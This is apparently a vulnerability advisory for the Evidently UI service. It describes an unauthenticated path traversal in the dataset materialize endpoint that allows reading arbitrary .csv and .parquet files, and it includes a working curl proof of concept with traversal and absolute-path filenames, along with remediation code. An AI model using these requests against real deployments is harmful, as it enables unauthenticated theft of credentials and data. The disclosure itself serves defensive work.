Summary
The Evidently UI service exposes a dataset "materialize from source" endpoint that accepts a fully attacker-controlled filename and passes it, without any containment check, into the local blob storage which reads it with posixpath.join(base_path, filename). Because posixpath.join honors both ../ segments and absolute paths, an attacker can read any .csv or .parquet file on the host filesystem (outside the workspace directory) and then download its contents through the dataset download endpoint.
In the default configuration (evidently ui, started without a secret), the service runs with NoSecurityComponent, so every endpoint is unauthenticated. The result is unauthenticated arbitrary file read over the network.
Affected Versions
Confirmed on v0.7.21 (latest release). The vulnerable code path is present in the evidently.ui.service package.
Details
The endpoint POST /api/datasets/materialize (src/evidently/ui/service/api/datasets.py) builds a data source from the request body and materializes it:
@post("/materialize")
async def materialize_from_source(
data: MaterializeDatasetRequest,
dataset_manager: ...,
user_id: UserID,
project_id: ProjectID,
) -> MaterializeDatasetResponse:
df = await data.source.to_data_source(user_id=user_id, project_id=project_id).materialize(dataset_manager)
dataset = await dataset_manager.upload_dataset(...) # stores df as a new dataset you can download
return MaterializeDatasetResponse(dataset_id=dataset.id)
When the source is a FileDataSource (src/evidently/ui/service/datasets/data_source.py), filename is taken verbatim from the request:
class FileDataSource(SortedFilteredDataSource):
project_id: ProjectID
filename: str
is_tmp: bool = False
def read(self, storage):
df = FileIO(storage).read_file_from_storage(self.project_id, self.filename)
return df
FileIO.read_file_from_storage (src/evidently/ui/service/datasets/file_io.py) only validates the file extension, then reads the path as a blob id:
def read_file_from_storage(self, project_id, file_id):
_, file_extension = os.path.splitext(file_id)
if file_extension not in self.ALLOWED_FILE_READERS.keys(): # .csv / .parquet only
raise HTTPException(status_code=400, detail="Extension not allowed")
file_content = self.file_storage.get_dataset(file_id) # file_id == attacker filename
...
DatasetFileStorage.get_dataset(blob_id) -> BlobStorage.get_blob_data(blob_id) -> FSSpecBlobStorage.open_blob -> FSLocation.open (src/evidently/ui/service/storage/fslocation.py):
@contextlib.contextmanager
def open(self, path: str, mode="r"):
with self.fs.open(posixpath.join(self.path, path), mode) as f:
yield f
There is no normalization or base-directory containment. posixpath.join("workspace", "../../../../etc/x.csv") escapes the workspace, and posixpath.join("workspace", "/tmp/x.csv") discards the base entirely and reads the absolute path.
The materialized rows are then stored as a normal dataset and can be retrieved verbatim through the unauthenticated read routes GET /api/datasets/{id}/download and GET /api/datasets/{id}.
The only restriction is the extension allowlist (.csv, .parquet). These formats commonly contain database dumps, credential exports, model training data, and PII on the same host.
Proof of Concept
Prerequisites:
pip install evidently==0.7.21
- A sensitive
.csv file existing outside the workspace, simulating any data export / credential file on the host.
Steps:
- Create a sensitive file outside the workspace:
printf 'secret_col,value\nADMIN_DB_PASSWORD,hunter2_supersecret\n' > /tmp/secret_outside.csv
- Start the Evidently UI with its default configuration (no secret = no authentication):
mkdir -p /tmp/ev_run/workspace
cd /tmp/ev_run
python -c "from evidently.ui.service.app import run_local; run_local(host='127.0.0.1', port=8011, workspace='/tmp/ev_run/workspace')"
- Create a project (unauthenticated):
curl -s -X POST http://127.0.0.1:8011/api/projects \
-H 'Content-Type: application/json' \
-d '{"name":"poc","description":"x"}'
Output:
"019ecac5-bf25-7a67-85ab-b2071b844ca1"
- Materialize a dataset from a traversal filename (PROJECT_ID from step 3):
curl -s -X POST "http://127.0.0.1:8011/api/datasets/materialize?project_id=019ecac5-bf25-7a67-85ab-b2071b844ca1" \
-H 'Content-Type: application/json' \
-d '{
"name": "stolen",
"source": {
"type": "evidently:data_source_dto:FileDataSourceDTO",
"filename": "../../../../../../tmp/secret_outside.csv"
}
}'
Output:
{"dataset_id":"019ecac6-2ade-776e-bf50-a6ae18a25521"}
- Download the stolen file contents:
curl -s "http://127.0.0.1:8011/api/datasets/019ecac6-2ade-776e-bf50-a6ae18a25521/download?format=csv"
Output (contents of /tmp/secret_outside.csv, which lives outside the workspace):
secret_col,value
ADMIN_DB_PASSWORD,hunter2_supersecret
An absolute path works identically (the join discards the workspace base):
printf 'k,v\nABSOLUTE_READ,works\n' > /tmp/abs_secret.csv
curl -s -X POST "http://127.0.0.1:8011/api/datasets/materialize?project_id=019ecac5-bf25-7a67-85ab-b2071b844ca1" \
-H 'Content-Type: application/json' \
-d '{"name":"abs","source":{"type":"evidently:data_source_dto:FileDataSourceDTO","filename":"/tmp/abs_secret.csv"}}'
# -> {"dataset_id":"019ecac6-686e-7e6d-9afe-23697614e585"}
curl -s "http://127.0.0.1:8011/api/datasets/019ecac6-686e-7e6d-9afe-23697614e585/download?format=csv"
# -> k,v
# ABSOLUTE_READ,works
Impact
An unauthenticated remote attacker (or, when a token is configured, any authenticated user) can read arbitrary .csv and .parquet files anywhere on the server filesystem and exfiltrate their full contents. This discloses database exports, credential/secret files, training datasets, and other tenant data stored on the host, regardless of the project the attacker can access.
Suggested Remediation
Resolve and contain the requested path before opening it. For example, in FSLocation.open (and the other path-taking methods) reject absolute paths and normalize/verify the result stays under self.path:
def _safe(self, path: str) -> str:
full = posixpath.normpath(posixpath.join(self.path, path))
base = posixpath.normpath(self.path)
if full != base and not full.startswith(base + posixpath.sep):
raise PermissionError("path escapes storage root")
return full
Additionally, in read_file_from_storage / FileDataSource, validate that filename contains no path separators or .. segments, and resolve dataset files only by their stored blob id rather than a client-supplied path.
Summary
The Evidently UI service exposes a dataset "materialize from source" endpoint that accepts a fully attacker-controlled
filenameand passes it, without any containment check, into the local blob storage which reads it withposixpath.join(base_path, filename). Becauseposixpath.joinhonors both../segments and absolute paths, an attacker can read any.csvor.parquetfile on the host filesystem (outside the workspace directory) and then download its contents through the dataset download endpoint.In the default configuration (
evidently ui, started without a secret), the service runs withNoSecurityComponent, so every endpoint is unauthenticated. The result is unauthenticated arbitrary file read over the network.Affected Versions
Confirmed on v0.7.21 (latest release). The vulnerable code path is present in the
evidently.ui.servicepackage.Details
The endpoint
POST /api/datasets/materialize(src/evidently/ui/service/api/datasets.py) builds a data source from the request body and materializes it:When the source is a
FileDataSource(src/evidently/ui/service/datasets/data_source.py),filenameis taken verbatim from the request:FileIO.read_file_from_storage(src/evidently/ui/service/datasets/file_io.py) only validates the file extension, then reads the path as a blob id:DatasetFileStorage.get_dataset(blob_id)->BlobStorage.get_blob_data(blob_id)->FSSpecBlobStorage.open_blob->FSLocation.open(src/evidently/ui/service/storage/fslocation.py):There is no normalization or base-directory containment.
posixpath.join("workspace", "../../../../etc/x.csv")escapes the workspace, andposixpath.join("workspace", "/tmp/x.csv")discards the base entirely and reads the absolute path.The materialized rows are then stored as a normal dataset and can be retrieved verbatim through the unauthenticated read routes
GET /api/datasets/{id}/downloadandGET /api/datasets/{id}.The only restriction is the extension allowlist (
.csv,.parquet). These formats commonly contain database dumps, credential exports, model training data, and PII on the same host.Proof of Concept
Prerequisites:
pip install evidently==0.7.21.csvfile existing outside the workspace, simulating any data export / credential file on the host.Steps:
Output:
Output:
Output (contents of
/tmp/secret_outside.csv, which lives outside the workspace):An absolute path works identically (the join discards the workspace base):
Impact
An unauthenticated remote attacker (or, when a token is configured, any authenticated user) can read arbitrary
.csvand.parquetfiles anywhere on the server filesystem and exfiltrate their full contents. This discloses database exports, credential/secret files, training datasets, and other tenant data stored on the host, regardless of the project the attacker can access.Suggested Remediation
Resolve and contain the requested path before opening it. For example, in
FSLocation.open(and the other path-taking methods) reject absolute paths and normalize/verify the result stays underself.path:Additionally, in
read_file_from_storage/FileDataSource, validate thatfilenamecontains no path separators or..segments, and resolve dataset files only by their stored blob id rather than a client-supplied path.